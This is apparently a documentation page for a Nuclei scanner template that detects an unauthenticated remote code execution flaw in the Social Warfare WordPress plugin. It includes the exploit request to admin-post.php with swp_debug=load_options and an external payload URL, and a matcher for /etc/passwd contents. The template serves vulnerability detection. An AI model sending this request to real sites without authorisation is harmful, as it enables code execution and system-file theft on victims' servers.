Skip to content

Social Warfare <= 3.5.2 - Remote Code Execution

ID: wp-social-warfare-rce

Severity: critical

Author: theamanrawat

Tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce

Unauthenticated remote code execution has been discovered in functionality that handles settings import.

id: wp-social-warfare-rce
info:
name: Social Warfare <= 3.5.2 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
Unauthenticated remote code execution has been discovered in functionality that handles settings import.
remediation: Fixed in version 3.5.3
reference:
- https://wpscan.com/vulnerability/9259
- https://wordpress.org/plugins/social-warfare/
classification:
cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 1
vendor: warfareplugins
product: social_warfare
publicwww-query: "/wp-content/plugins/social-warfare/"
tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce
http:
- raw:
- |
GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url={{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path: helpers/payloads/wp-social-warfare-rce.txt
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- type: word
part: body
words:
- 'No changes made'
- type: status
status:
- 500
# digest: 490a004630440220552b5b6c612af4a7ef21ab820439592230985461bdf4d43c5a3b0dc85595ab23022003d7b9744f4f922f93e4accffd1951b0613c87c13297e5019c5470e07eb0e33a:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml"

View on Github